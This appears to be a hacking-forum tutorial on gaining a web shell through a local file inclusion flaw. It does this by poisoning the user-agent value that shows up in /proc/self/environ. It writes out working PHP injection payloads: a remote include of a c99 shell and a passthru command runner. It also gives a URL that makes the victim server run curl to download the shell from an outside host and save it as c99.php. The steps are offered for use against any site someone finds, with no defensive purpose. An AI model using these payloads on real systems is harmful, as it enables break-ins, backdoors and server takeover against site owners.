Uploading shell by using LFI
================================
Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================
So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs
Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?
Open a new tab in Mozilla,and type "about :config" (without quotes)...
Now,in "Filter" type: general.useragent.extra.firefox
You will get something like this:Preference name Status Type Value
general.useragent.extra.firefox default string Firefox/3.0.7
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with<? include("http://shelladdress.com/c99.txt"); ?>
If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...
Instead of typing<? include("http://shelladdress.com/c99.txt"); ?>
as useragent,type this:<? passthru($_GET['cmd']); ?>
Then load your vuln page like this:http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...
Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this:http://yourvulnsite.com/c99.php
And that's all...
Enjoy,if I helped you,hit the thanks button...]
